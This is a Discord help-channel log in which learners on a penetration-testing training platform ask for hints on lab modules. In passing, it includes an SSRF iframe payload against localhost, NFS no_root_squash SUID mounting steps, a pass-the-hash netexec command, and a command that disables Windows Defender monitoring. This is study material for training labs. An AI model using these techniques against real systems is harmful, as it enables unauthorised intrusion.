Dumb idea, but for Pentester Pathway, should I skip the AD module, finish the web modules and then go back to AD modules before I do AEN?

cloud urchin
#

You can go in any order you want. Some modules build off previous knowledge from the path though.

native shell
#

hello everyone. im new here can someone help me a bit?

acoustic owl
native shell
#

just to start. assming im a full beginner and want to start. where should i start? which path or module you guys suggest?

compact patrolBOT
native shell
#

so itmeans i should start with networking? and i wanted a tip... im kinda broke rn so shouldi really consider buying htb to access other things which i cant now

acoustic owl
acoustic owl
dry falcon
#

Windows Privilege Escalation.

Other files - section

Using the techniques shown in this section, find the cleartext password for the bob_adm user on the target system.

I did search the entire packages folder, where in the module it's said to contain passwords ( uers likely store them there). Yet, I have found nothing. Any hints?

opal nexus
#

Has anyone done the "SSL/TLS Certificate Pinning Bypass" section of "Android Application Dynamic Analysis" module for help?

soft stirrup
#

Is someone able to help me understand a question in Windows Event Logging Basics? the first question im getting confused on why we are looking at an event (8/3/2022 at 10:23:25) but the answer is in a different event (8/30/2022 10:23:49 AM:)?

forest tendon
#

Which module should be choosen after completing "introduction to active directory"?

timber tapir
#

New to HTB, looking for teammates to collaborate on labs via shared terminals. Anyone into web pentesting?

forest tendon
#

I miss the previous moderator ! he was active and really good with guiding students

leaden island
#

yo guys im on AD enum, cross forest attacks from linux

#

im supposed to have credentials for the user wley, but theyre not mentioned in the section

noble sand
#

Hi everyone, I’ve been stuck for 2 days on the Injection Attacks Skills Assessment (https://academy.hackthebox.com/module/204/section/2235) and I need some help.

I can’t find any internal port that works through the SSRF. <iframe src="http://127.0.0.1:PORT/" width="800" height="500"> I’m pointing the SSRF to 127.0.0.1, and the only port that responds is 80, but the server response gives errors with external resources (fonts, CSS, JS), so the PDF doesn’t even get generated.

I’ve tried all the common HTTP port wordlists from SecLists, and none of them worked. I’m completely stuck and would appreciate any guidance on how to proceed.

Thanks in advance.

forest tendon
#

have you tried modifying the error into 200 response via burpsuite?

harsh latch
storm elk
#

@little belfry this is not the server and please , English only

#

Don’t spoil content please @leaden island

leaden island
#

didnt mean it sry

storm elk
#

No worries

leaden island
#

yeah found it thanks

prisma wing
#

Hi all, need help with the following module 'https://academy.hackthebox.com/module/80/section/780'. It states to right click the request then select 'Do Intercept - Response to this request', however as you can see in my screenshot, i don't have this option. Can someone assist please?

forest tendon
#

you are clicking in the wrong area it should be on the requested page try right clicking in the bottom left portion

prisma wing
forest tendon
#

go to the intercept

prisma wing
#

I'm there, now what do i do please?

forest tendon
#

you have to intercept a request first

#

once you intercept the request you will be able to see a request in the right side

prisma wing
#

Aha! my bad, thank you!

forest tendon
#

like this

storm elk
#

you can dm me

quiet trout
#

@prisma wing theres an entire module that covers burp and zap have you looked into it?

noble sand
# forest tendon have you tried modifying the error into 200 response via burpsuite?

Thanks for the suggestion! I actually already tried that, and in my case the response is already 200 OK. The issue isn’t the status code β€” it’s that wkhtmltopdf can’t load external resources (fonts, CSS, JS) from CDNs, so it ends with Exit with code 1 and the PDF doesn’t get generated.

I think the problem might be the port, and I’ve tested many ports using common HTTP port wordlists, but I haven’t found any that respond correctly. The only port that responds is 80, but it still gives the errors I mentioned above.

I believe it must be another port, but I need help figuring out which one works...

prisma wing
prisma wing
forest tendon
#

you should try a universal port scan as well , like literally all 65535 ports via nmap

noble sand
# forest tendon you should try a universal port scan as well , like literally all 65535 ports vi...

I actually already tried scanning all 65535 ports, but it’s not really viable in this lab. Each request goes through wkhtmltopdf to generate a PDF, and every PDF takes several seconds to process. Sending 65k requests would take days, and if done in parallel, the PDF generator would likely break.

This isn’t about Nmap... I’m trying to connect to an internal service using SSRF with a payload like: <iframe src="http://127.0.0.1:PORT/" width="800" height="500">
There must be another way to solve this, since scanning all ports like that isn’t practical. I’m completely stuck, I’ve tried everything, and I just can’t figure it out.

gray yacht
scarlet rain
#

In the skill assessment of File Upload Attacks, I uploaded a file name HTB.jpg, I should be able to access it through ||http://94.237.60.55:42617/contact/user_feedback_submissions/250822_HTB.jpg|| but the sever just throw not found at me, can some one help?

UPDATE, I FOUND A WAY TO FIX IT BELOW.

prisma wing
scarlet rain
#

All of it didn't work man

#

Alright, thank you

#

I've just DM you

#

Can you check my DM, please πŸ™ I encountered the same thing?

#

No

scarlet rain
#

turns out you have to press this little button first before uploading

#

Then the file will appeared after you press SUBMIT, anyone having the same problem in the Skill Assessment in File Upload Attacks - this is the way. Bye everybody

tough drum
#

Hey y'all, my target doesn't want to connect via ssh and whenever I do try and connect to it via ssh I get "ssh: connect to host 10.129.219.235 port 22: No route to host"

when I try and ping it I get "From 10.10.14.1 icmp_seq=1 Destination Host Unreachable"

I am in the Find Files and Directories section of the Linux Fundamentals course, could someone please help me out? VPN is up and I launched the corresponding .ovpn file as well.

supple dragon
tough drum
# brave field Try another VPN server

I have tried like 6 this morning. Issue has been ongoing since last night. ChatGPT says it's an issue on HTB side and / or it could be that the machine is retired which wouldn't make sense if the course is still available (to me anyways) and so I decided it would be best to come ask in here to confirm or deny that being the case.

#

I am willing to use PWNBOX but since I am a free account catching up on HTB to where I was on LetsDefend I need confirm it so I can dial in the next 2 hours and try and finish the course entirely.

brave field
tough drum
#

Ayyyy that worked!!!!

#

@brave field you da best

#

Thank you so much

idle tundra
drifting dirge
# idle tundra I'm also facing the same issue. Have you resolved it?

Not in the intended way I guess πŸ˜€ I found an article and then an exploit in Metasploit, exploiting exactly the same problem, but with model endpoint. Funny part that exploit was broken, so I fixed it and created a pull request. https://github.com/rapid7/metasploit-framework/pull/20489

I'm not totally sure where is the problem with given solution in article on the academy, but I tried with different YAML files, handlers, etc.

supple dragon
#

you can DM me

prisma wing
#

For module 'https://academy.hackthebox.com/module/80/section/781', i need to enumerate the admin id and it says to go abck to the brute force attacks section but it does not explain how to enumerate the id of a user, only the usernames or passwords. How would i enumerate the id please?

waxen totem
prisma wing
prisma wing
waxen totem
prisma wing
#

I'm just going to brute force the username and password, it;d be easier lol

fathom pendant
#

But to inject code it'd be $() not <()

#

Or `code here`

#

(The backtick method is more archaic)

cunning violet
#

Advanced XSS and CSRF Exploitation - any nudge on the back half of this skill assesment?

cunning violet
#

cool ty

torn fiber
#

hello, i am in Skills Assessment - Password Attacks and need some help/hint. i have initial foothold at DMZ01 i do not know after that and stuck.

torn fiber
fathom pendant
#

I suggest ligolo-ng

torn fiber
full echo
austere hound
#

Hello i m trying to complete the "Attacking Thick Client Applications" module searching for the credentials, but when i m about to launch the "monta.ps1" script with powershell, i got this error in CLI "System.Management.Automation.Runspaces.InitialSessionState' threw an exception." . Seems i can not launch powershell at all. NO CLI.
Can someone help me?
Thank you in advice.

uncut crown
#

I'm trying to do the Vulnerability Assessment with Nessus, but can't get Nessus to run on the HTB Workstation. I don't have permissions to install, so I can't figure out what I'm doing wrong...

#

I am trying to use VirtualBox to get it to work now.

opal nexus
idle tundra
gray yacht
uncut crown
#

Don't I have to start the nessus service first? It won't let me do that. When I try to navigate to the ip:port, it says "Connection has timed out".

gray yacht
uncut crown
gray yacht
uncut crown
gray yacht
uncut crown
#

Ok. I'll try that. Even on my VirtualBox, it scans for a few seconds and gives blank reports.

gray yacht
uncut crown
#

Ok. So, it's a saved scan when I login with the provided creds?

gray yacht
uncut crown
#

Right. I just wasn't sure cause I haven't gotten that far. lol

#

I tried to install it and it said that I didn't have permission?

#

I'll try again.

gray yacht
#

I just spun it up and went straight to the UI

#

Just had to accept the cert. Using off the shelf kali with VMware. I'm on us-academy-3

#

That's odd.

uncut crown
#

Ok. It let me install it that time. idk what I did different. lol

#

Used curl instead of just downloading from the browser...

gray yacht
#

Did you ssh into the target?

#

I assumed this was the nessus SA.

gray yacht
uncut crown
#

Vulnerability Assessment

#

The second one is the actual skills assessment part.

gray yacht
uncut crown
#

I'm trying both ways. The pwnbox wasn't letting me install before, so I went to VirtualBox, but that wasn't doing the scanning, so I went back to pwnbox.

gray yacht
uncut crown
#

Ok. I am.

#

I did.

gray yacht
#

You do not need to install nessus, as the target is the nessus instance.

#

This is a Tier 0 you guys can keep going here unless you want to take it to DMs.

uncut crown
#

The more the merrier. lol

#

I've tried using "localhost" too.

#

I got it!

#

Well, YOU got it. lol

#

Thank you! πŸ™‚

#

This has been driving me crazy for the last week! lol

#

I appreciate you both! πŸ™‚

heady sapphire
#

Hello ? The command netexec smb <ip/24> -u Administrator -d . -H <hash_value> is the same with the command netexec smb <ip/24> -u Administrator -H <hash_value> β€”local-auth?

void badger
#

Hi, is there anyone who solved Applications of AI in InfoSec skill assessment. Long time here many tries but no result. Any working hint?

#

I tried many variations of the code, but the answer is still the same: "Your model accuracy is 0.0. Please improve it to at least 90% to receive the flag."

dry falcon
#

Some people prefer -d . because it’s shorthand and works in CME (legacy habit).

Others prefer --local-auth because it’s explicit and avoids confusion when you’re mixing domain + local checks in the same engagement.

uncut crown
#

@cunning canopy @gray yacht I got done with the Nessus Assessment! It was fairly simple after I got into Nessus. The only problem I had after connection is that it kept timing out and I had to refresh it after a few minutes. It probably happened 3-4 times, but that's all that slowed me down. Thank you both, again!

scarlet rain
#

@gray yacht can you check DM

topaz tundra
#

Hey guys please I need help from anyone who finished the Introduction to bash scripting module

plain summit
#

Windows Privilege Escalation Pillaging
Log in as Grace and find the cookies for the slacktestapp.com website. Use the cookie to log in into slacktestapp.com from a browser within the RDP session and submit the flag.

I press the save button in Firefox cookie menu after pasting content before refreshing but I'm not getting a change in the page itself.

tired flax
#

Hello there, anyone out there has done the Introduction to Deserialization Attacks assessment 2?

I have the ping working, but I don't get the callback, I already tried a lot of bypass for the blacklist

hazy grotto
frigid quail
#

guys i started the Linux Privilege Escalation module and on the very first question where i have to connect via ssh the whole thing lags and im not able to perform any commands the whole thing just frozzes any idea how to fix it ?

frigid quail
viscid bolt
#

Anyone have any success with DACL II Skills assessment?

rustic sage
#

if anybody could help em out and take a look at my community help zone question it would be greatly appreciated

cloud urchin
#

Is this related to a module?

#

you didn't input a host/ip to connect to

#

If your question is related to a module you should just ask it here.

rustic sage
#

i cant share screenshots here

#

yeah its related

rustic sage
cloud urchin
#

no you didn't

cerulean gazelle
#

howdo i start hacking?

compact patrolBOT
dry falcon
cloud urchin
dry falcon
cloud urchin
#

read the section again

white beacon
#

Hello friendly hackers, I am having trouble with the Skills Assessment for CrackMapExec Module
Section link: https://academy.hackthebox.com/module/84/section/1747
Qn 4: Read the flag from the shared folder Ccache.
May I know if anyone can point me in the correct direction?

wooden halo
#

Hello guys, I am doing this Linux Enum module for CPTS. today when i tried to ssh to the target it is denying to connect. It will be helpful if someone could help me out.

Im connected to the vpn, the target machine is also pingable. But when i try to ssh, it says Connection refused by target.

#

Module Name: Linux Privilege Escalation

cloud urchin
#

sorry, which module and section?

wooden halo
#

Module Name: Linux Privilege Escalation
Section: Environment Enumeration

topaz tundra
#

hello guys i'm doing windows fundamental module i'm at the last exercise when i get the SID of the users and the group I created the answer is refused

cloud urchin
wooden halo
cloud urchin
wooden halo
#

i check the target in nmap, it shows ssh as open port.

wooden halo
cloud urchin
#

probably try restarting the target

cloud urchin
wooden halo
cloud urchin
#

try changing vpn regions

wooden halo
#

Okayy!! let me check

topaz tundra
sweet comet
#

Currently having some issues/confusion in the Windows Lateral Movement > Windows Server Update Services (WSUS) module. Anyone know if RDP to DC01 should work from start? It worked once for me then I reset the lab to do second question and now its not. And I seem to need it to install updates...

river grove
radiant relic
#

hi

#

i am new in server

#

i can't send a message in gΓ©neral chat

#

@river grove

acoustic owl
#

This is not the server for such things.
Please read #rules and #faq.

hearty rain
#

sorry bro

radiant relic
#

OK

#

sorry

fathom pendant
#

@trail ingot generally speaking; sharing details of a company you're doing a pentest of is highly unethical at best. also: this isn't an lfg server

#

are you sure you set the LHOST properly? (make sure you check the interfaces line up)

eternal vigil
fathom pendant
eternal vigil
#

should i skip host-1 for now and go for host-2 first ? @fathom pendant

eternal vigil
fathom pendant
#

you shouldn't have to skip it, but i'd use a higher port number to be sure, maybe it's not able to open/bind that port

eternal vigil
#

i have also tried 4444 default

fathom pendant
#

i also assume you launched the war file after uploading it

#

(navigate to the launched page)

eternal vigil
#

it deployed on its on

fathom pendant
#

it's not gonna automagically run until you call the webpage

eternal vigil
#

i relaunched it tho because it was taking so long

fathom pendant
#

i'm also assuming you have a listener waiting for the call

eternal vigil
fathom pendant
#

did you navigate to (click on) the directory /hell?

eternal vigil
eternal vigil
#

so sorry i took so much of your time i didn't know i had to do that

fathom pendant
#

3...2...1... kek

eternal vigil
#

i thought it was running because it was deployed

fathom pendant
#

deleting the og message because it's spoiling content (even though you used spoiler text, spoiler text really doesn't do anything)

eternal vigil
#

thankyou very much @fathom pendant , also can you nudge me how could we find the creds given in hint on our own ? like i had to look up the hint for the creds

fathom pendant
frigid quail
#

guys i started the Linux Privilege Escalation module and on the very first question where i have to connect via ssh the whole thing lags and im not able to perform any commands the whole thing just freeze any idea how to fix it ?
i restarted the machine several times and changes the vpn file a couple of times but still its freezing on commands and on login aswell

user@debian:~$ sudo ssh htb-student@10.129.205.110
[sudo] password for user: 
htb-student@10.129.205.110's password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-148-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
fathom pendant
eternal vigil
frigid quail
#

where can i contact support ?

fathom pendant
#

the jump host is the initial host you rdp into (or ssh, i forget if you can do that for this one)

compact patrolBOT
frigid quail
#

thanks

eternal vigil
#

are you sure the username wordlist is correct which you're supposed to use ?

silent isle
sweet comet
#

Have this exact issue. Found it?

blissful plume
#

I need a small help with an additional/optional exercise in Cracking Passwords with Hashcat,

You are conducting a penetration test for your client Inlanefreight and have Responder log data from the tool running overnight. You obtained the NTLMv2 password hash for the adconnectsvc user but all attempts to crack it have been unsuccessful. Recently, however, you read about another method to obtain something usable when you have an NTLMv2 password hash. Checking the project files from the previous year you also have the last NTDS dump to work with. Using Hashcat, find a way that you can leverage the NTLMv2 hash to authenticate as this user within the domain. Submit this string as your answer. Download the file "hashcat_addtnl_exercise.zip" from optional resources to get started.

#

Can i attach the .log and NTDS file?

#

Just need a small hint

fathom pendant
#

you cannot, since the module is above tier0

blissful plume
#

Anyone? If someone’s done it, just need a small hint :’(

quiet trout
#

When the password attacks module talks about this section:

A salt is not a secret value β€” when a system goes to check an authentication request, it needs to know what salt was used so that it can check if the password hash matches. For this reason, salts are typically prepended to corresponding hashes. The reason this technique works against rainbow tables is that even if the correct password has been mapped, the combination of salt and password has likely not (especially if the salt contains non-printable characters). To make rainbow tables effective again, an attacker would need to update their mapping to account for every possible salt. A salt consisting of just one single byte would mean the 15 billion entries from before would have to be 3.84 trillion (factor of 256).

Are they saying salts are used to prevent previously known/leaked/crack(unsalted, reused) passwords from being usable on the service?

If not, then im failing to understand how salting passwords doesnt require a table of salts to be needed to verify the password? application still has to keep up with a unique salt for each password... which seems adding little extra securirty for a lot of extra overhead?

fathom pendant
quiet trout
#

oh wait i think it clicked... the application doesnt store the password? it stores the salt and a hash of the salt + password then checks that?

#

ok i think i get it now. if your database of creds is leaked its only SLIGHTLY better than storing the password hash because you still have to store the salt alongside the password hash. but i guess its better than nothing?

grave pier
#

Hello, could anyone please help me to deal with my ctf challenge (pwn). I'm a newbie and honestly i hav tried to solve it for 6h long πŸ™

#

it's a program. it works like u insert your name and your birthday. it will told you the flag if you insert the same as they want or they wont give u
it's told that we must know/use shellcode
but idk how to

quiet trout
#

Not sure man, we solve htb boxes which are kinda like ctfs, and other challenges here. Consider switching gears and doing a box

fathom pendant
supple cairn
#

Hi

grave pier
fathom pendant
quiet trout
#

do i need to echo -n or something? i know theres a trick sometimes where you have to do somethign to get rid of extra lines or spaces?

supple cairn
#

Hi folks
Is there any guide about how to create machines? (I mean, not the guide about how to submit machines, but how to actually create one)

dusty ledge
quiet trout
#

i still dont know if the ? is necessary or not

minor lantern
#

Hi guys I just purchased silver annaul

#

Today and my goal is cpts

#

From 0 to hero and what path before pentesting path is suggested to take ?

quiet trout
#

Are you totally new? take the zero to hero stuff then take the intro to cybersecurity or whatever thats called then take the cpts

minor lantern
#

I mean I have net+,sec+,pen+ then I'm already halfway through ejpt and I know basic linux privesc and pentesting stuff

quiet trout
#

Do you know how to use burp, how to curl, how to fuzz etc?

#

sounds like you do

minor lantern
#

Yeah I know basic stuff with burp like turbo repeater for rc, repeater for uk multiple times response analysis then one more function which is used to fuzzing and idk how to use curl to the fullest tho

#

I did some labs on port swig academy but not good coder or web sec expert tho

quiet trout
#

sounds like you've got a handle on things. I feel like you'd be ok starting CPTS since thats what you came here to do

minor lantern
#

You can consider I have 0 coding

quiet trout
#

it wouldnt hurt to browse thru the intro to cyber sections or whatever its called

minor lantern
#

That's the main problem

quiet trout
#

i actually picked up some good info from that module too just because it was available

#

i think it was free when i did it

#

there's always little nuggets of golden info to gather all over these paths or modules or whatever but you prob be alright just starting the cpts.

minor lantern
#

I think I can access everything till tier two which covers what you said doesn't it?

quiet trout
#

i believe so

minor lantern
#

Then I'll do the junior cyber analyst path first which is their newest cert

#

That is the basic one which I could find on website please do share the fundamentals path link that you used

quiet trout
#

i think its called information security foundations in the paths sections

gray yacht
sweet comet
kind reef
#

hy

gray yacht
sweet comet
alpine mural
#

Hi! Someone in Attacking AI - Application and System?

viral orbit
#

Is anyone facing a problem using droopescan?

torn fiber
shadow cloud
#

Hi Im stuck on the NTLM Relay Attacks Assessment QN4 after getting QN3 so is there anyone that can DM me about hints to get through this qn?

minor lantern
torn fiber
hot cedar
#

Not sure if this is the best place to ask (and I probably just missed something obvious). But how do I copy to/from the in browser attack box?

smoky whale
#

Evening gents

opal shuttle
terse bloom
#

Hello, I am stuck on Active Directory Enumeration & Attacks module - Credentialed Enumeration from Windows. I am trying to answer the first question, I feed it the amount of kerberoastable users I could query from bloodhound, but no numbers are correct (I get only one user). And for some reason results are different with SharpHound.exe 2.7.1 (it shows less users than with Sharphound 1.0.3), why?

hot cedar
opal shuttle
#

then go to browser paste simple with ctrl+v

hot cedar
#

Uh if that’s it, I do feel dumb - thanks (hope that is it too)

opal shuttle
#

everyone learns from somewhere

grim gust
#

is there an Sysreptor module ?

sly moon
#

not sure if you figured it out or if anyone else has issues this worked for me
sudo timedatectl set-ntp off
sudo rdate -n ip address

dry falcon
dark hedge
opal shuttle
#

if you want to upload something to that share then you need write permissions

woven storm
#

Hello, I am stuck at Blacklist filters section of File Uploads Attack module. i fuzzed extensions and found few extensions like .php3, .php4 but .phtml wasn't allowed like they showed in HTB reading but anyways i uploaded shell.php4 but when i visit the url to cat the flag. webshell is not working page is completely blank i viewed page source and getting my whole php code back. i have created a detailed note of what i have done till now but since i think i am 90% there this detailed steps might be looked like walkthrough so if someone have already done this module or guiding me right now. i might paste here and once you read it i'll delete it afterwards soit did not provide any spoilers/walkthrough for upcoming users

opal shuttle
woven storm
#

@opal shuttle i think i should try the above method first

opal shuttle
#

you can dm me

#

if you wanna talk in detail regarding this

opal shuttle
#

and each has their own pros and cons

#

in rev shell module they teach this i guess

#

not sure

woven storm
woven storm
opal shuttle
#

dont know

#

but webshell has some limitations

#

so its better to get a rev shell and try there

#

if its not working

#

@woven storm lets move to dm

real tapir
#

Module Name
Linux Privilege Escalation
Section Name
Miscellaneous Techniques
Question you're struggling with
Review the NFS server's export list and find a directory holding a flag.
Generally what you've tried (while avoiding spoilers, i.e. logged in as j and couldn't find anything)*
I ssh'd into the target server, then immediately ran the following commands with the following output:

htb-student@NIX02:~$ cat /etc/exports
..SNIP..
/var/nfs/general *(rw,no_root_squash)
/tmp *(rw,no_root_squash)
htb-student@NIX02:~$ ls /var/nfs/general
exports_flag.txt
htb-student@NIX02:~$ cat /var/nfs/general/exports_flag.txt
<flag>

My problem
I don't know how I'm actually supposed to mount the filesystem and solve the challenge.

woven storm
opal shuttle
#

but i guess chatgpt will help you out with that

#

for quick help ..if you want immediate help

real tapir
#

I don't want immediate help, I just want to understand how to exploit this particular misconfiguration. Specifically, there are some commands in the section I don't understand:

root@Pwnbox:~$ sudo mount -t nfs 10.129.2.12:/tmp /mnt
root@Pwnbox:~$ cp shell /mnt
root@Pwnbox:~$ chmod u+s /mnt/shell

I don't understand where I am supposed to run these commands.

grim gust
#

On your own machine it will mount it as root you place the file als root with suid and execute it on the target.
Because it is root and suid πŸ€—πŸ€—

real tapir
#

So the NFS is mounted to my local virtual machine or htb's box?

cunning fern
#

hey guys, is nibbler broken? NOTHING works for me, i tried following the module but i cannot ecalate the privilages whatever I do

real tapir
cunning fern
#

its getting a bit frustrating cuz its like the 3rd time im trying to do it and Im not sure if I am doing something wrong? executing the ||monitor.sh|| throws errors and it doesnt do a thing

#

jfc now even the port listening doesnt work NotLikeThis

cloud urchin
scarlet rain
# cloud urchin The attacker box.

Hi, I made a little python script to correctly encode gopher request for SSRF section in module - Server-side Attacks, can I share it on github?

cloud urchin
#

Yeah that's fine

scarlet rain
cunning violet
bold niche
scarlet rain
viscid bolt
#

Currently doing DACL Attacks II skills assessment and this is the hint for the last question || Search for rights in non-common locations where you can control everything. || Tried looking at ldap attributes - curious if anyone might have any input

candid echo
native shell
#

Everyone. I needed a little help. I want to create a payload for my android 8 to test it. Can you guys please help. I'm not a full beginner but a small help is appreciated.

cloud urchin
granite canopy
#

I need some help with windows lateral movement- skills assessment Q5, finding the password for VNC.

inner adder
#

Hello everyone, I know I'm not in the right place. There's something I don't quite understand. I validated my Discord account for HTB, but the bot command returns an error. Why?

gray yacht
alpine mural
granite canopy
crystal cove
#

i found the ftp transfered file called flag but thats not the flag, or else we didnt watch the same transformer movies

crystal cove
#

found it, this question was using the attached file whereas the tutorial was on the live data

fathom pendant
#

By tutorial, are you referring to the guide provided with annual? If so, sharing information from that is generally against ToS

alpine mural
crystal cove
fathom pendant
#

Its still a tier 2 module so sharing info from the modules is still spoilers

crystal cove
#

which info

fathom pendant
#

But yeah, sometimes it can be captured, and sometimes its in the given data

fathom pendant
barren apex
#

Module: Pivoting, Tunneling, And Port Forwarding
Section: RDP and SOCKS Tunneling with SocksOverRDP
Question:
This section talks about loading a plugin named SocksOverRDP-x64.dll using regsvr32.exe
But, the file SocksOverRDP-x64.dll is being deleted by Windows Defender.

How am I supposed to finish this?

Edit: solved, I had to run
Set-MpPreference -DisableRealtimeMonitoring $true
before doing it

cloud urchin
#

Disable real-time protection

#

oh you solved it you said. nm.

barren apex
#

Module: Pivoting, Tunneling, And Port Forwarding
Section: Skill Assessment
Question: Submit the contents of C:\Flag.txt located on the Domain Controller.

I do see the IP of the DC, but non of the credentials I found is working, also RDP with mstsc.exe doesn't work.
I tried winrm since port 5985 is open but that also didn't work.
Any nudges?

fathom pendant
barren apex
#

I am at the last stop, but couldn't find the way to DC

fathom pendant
#

perhaps you already have some access to the DC

elder hearth
#

Module: MSSQL, Exchange, and SCCM Attacks
Section: Skills Assessment
Can someone confirm that we can authenticate on any of the MSSQL database (DB01 or DB02)? I tried a lot of differents credentials and I can't connect to to either of them

spiral sapphire
#

Can someone give me a nudge on Module "Windows Lateral Movement" Skills Assessment #2 question? I've been stuck for 2 days straight and I highly appreciate if someone can help! Thank you in advance πŸ™‚

jade vortex
#

Sir I have a question regarding wordpress based attack can I put my query here?

acoustic owl
gleaming canyon
#

is there someone can helpmewith wifi pentestinganddecode cap,hash

#

give me amodule is there someone can helpmewith wifi pentestinganddecode cap,hash

jade vortex
acoustic owl
#

If you have no access, read and follow #welcome

quasi wave
gleaming canyon
#

i wouldlike comeupon it

acoustic owl
quasi wave
#

So it’s not totally out of the question for htb to have it

#

And offsec has macos malware certification so macos hacking pathways are not out of the question either.

#

I think altho its not the most likely thing

#

But imo an iphone and android mobile pentesting path would he perfect

#

Or even ipad

rocky estuary
#

Windows Privilege Escalation -> Print Operators

how i'm supposed to use UACme to see the full list of privileges ?

hasty mauve
#

I'm currently reviewing the Active Directory Enumeration & Attacks.
At Credentialed Enumeration - from Windows, the first question says Using Bloodhound, determine how many Kerberoastable accounts exist within the INLANEFREIGHT domain. (Submit the number as the answer).
Using the latest BloodHound CE, it gives me 12 Kerberoastable accounts, but the answer I have used in the past when doing this module is || 13 || and it appears to be the correct answer somehow
Is that a mistake in the module or what?

civic estuary
#

Hi guys, I am currently doing Password Attacks - Pass the Hash (PtH). I am stuck at getting David's NTLM/RC4. I have RDP into the machine and use mimikatz with sekurlsa::logonpasswords but it doesnt show David's hash or user with david. Is there something I have missed out?

safe star
compact temple
#

Can anyone nudge me on the ||xpath injection ||part in the final skills assessment of Injection Attacks module from CWEE path prayge ?

jagged schooner
#

Hi. I'm trying to finish the file upload: blacklist filters module on HTB Academy CWEE, and I would like to ask a general burpsuite question.

I know for a fact that the .phps , .php, and .php5 extension are blacklisted (see fig 1), but why does intruder show the response as successful (a 201 success response) ? (see fig_2.1 and 2.2).

Should I assume that the application is using non standard HTTP responses?

bright coral
#

Both, the repeater and the intruder show a 200 status code. Just the response body is different, most likely due to the encoding in the filename.
The 201 is the time it took the application to respond in ms.

brave field
rocky estuary
sly moon
#

In DACL Attacks II "Shadow Credentials section is this a typo? Shouldn't it be Jeffry's? Couldn't find any path forward with Gabriel's credentials.
Authenticate to (ACADEMY-DACL02-DC01) with user "gabriel" and password "Godisgood001"

  • 2 Compromise the account PCTEST001 and read the flag located at \LAB-DC\PCSHARES\pcflag.txt
brave field
hasty mauve
#

Idk which version it was exactly tbh

muted tulip
#

I have a question about purchasing a tier 4 module. If this module is later transferred to tier 3, will I get 500 cubes back?

acoustic owl
muted tulip
cunning fern
#

hey guys, im using parrot vm and i cant seem to install smbclient, what do I have to do to install it?

#

I need it for dancing:/

grim gust
#

It is the target ip πŸ™ feeling πŸ˜΅β€πŸ’«

winter vector
#

Is anyone working through the latest AI Red Teamer module? Attacking application and system components?
I think the Rogue Actions lab is bugged, I can't get it to work for the life of me. Maybe it's a skill isue πŸ™‚ Anyone in the same boat?

cobalt lava
#

Getting started - service scanning module

Anyone know why when i try run an smbclient scan i recieve this error

    Sharename       Type      Comment
    ---------       ----      -------
    print$          Disk      Printer Drivers
    users           Disk      
    IPC$            IPC       IPC Service (gs-svcscan server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
#

it lists the shares however seems to crash after

knotty granite
cobalt lava
knotty granite
cobalt lava
#

i was following the module and it was using \\ so thats what i thought was needed and i researched it & apparantly its because powershell treats it as an escape character

brave field
fathom pendant
#

negative aura for using powershell on linux

brave field
# hasty mauve LOL

Do try it on your own too and see if that's the case or not. I even did -c All option and the users were missing, which is weird.

harsh sundial
#

hello everyone i am doing the footprinting module at the point of mssql
i wanna use an nmap scan with the scripts i try to coppy the command given by the module but i keep running into error for the script and i am not sure on how to get the necesarry info in another way

opal shuttle
torn fiber
#

that is tier 2 i think go in dm probably

opal shuttle
#

@harsh sundial if u think there is no other without revealing much, you can dm me

cobalt lava
brave field
mellow sky
#

Hi, I think there is mistake in Citrix Breakout of Windows Privilege Escalation module

in Accessing SMB share from restricted environment part, it is expected to run
root@ubuntu:/home/htb-student/Tools# smbserver.py -smb2support share $(pwd)
but there is no smbserver.py there

harsh sundial
brave field
harsh sundial
#

sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.76.101
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-24 16:11 CEST
Nmap scan report for 10.129.76.101
Host is up (0.031s latency).

PORT STATE SERVICE VERSION
1433/tcp open ms-sql-s Microsoft SQL Server 2019
|_ms-sql-xp-cmdshell: ERROR: Script execution failed (use -d to debug)
|_ms-sql-config: ERROR: Script execution failed (use -d to debug)
|_ms-sql-dump-hashes: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-tables: ERROR: Script execution failed (use -d to debug)
|_ms-sql-dac: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-empty-password: ERROR: Script execution failed (use -d to debug)
|_ms-sql-hasdbaccess: ERROR: Script execution failed (use -d to debug)

brave field
harsh sundial
#

but i am curious because it was a smooth workflow upto this point

brave field
harsh sundial
opal shuttle
plain summit
#

Windows Privilege Escalation Windows Server

My meterpreter sessions does not start after I run the rundll32.exe \\localip\tXWM\test.dll,0 command on RDP

reef axle
#

hello all

#

I was exploring attacking applications with ffuf and web fuzzing, because one is part of BBH and one will be later, so I found no big difference expect api fuzzing, am i missing out somehting?

crystal cove
#

Hi Chat, i have a question before posting it in the erratum channel. In a deauthentication attack environment, one of the reasons attackers do deauthentication attacks is to disconnect an user from their network so they join ours so we can retrive their information right ? Because the text says the opposite and it does not make sense for me, why would i enforce an user to disconnect from my network so they can join theirs for me to retrive information ?

sinful tundra
#

How do I get more cubes or is it a buy only thing

acoustic owl
gray yacht
#

Please refrain from posting content over Tier 0, especially when it contains credentials.

#

Please refrain from posting content over Tier 0, especially when it contains credentials.

#

You need to pivot

median gale
regal kayak
#

I'm currently stumped on the Firewall and IDS/IPS Evasion - Hard Lab. I can get the versions on ||22 and 80|| but I'm a little lost on what to do next.

#

Dms accepted

scarlet dock
#

hi everybody
somebody can help me in DM with the module Skills Assesment of password cracking ? i'm really stuck PLEEEEASE

thanks 😁

rugged parrot
#

Hi all, when trying to connect to the target system via RDP, the target server terminates connection before providing the remote screen:

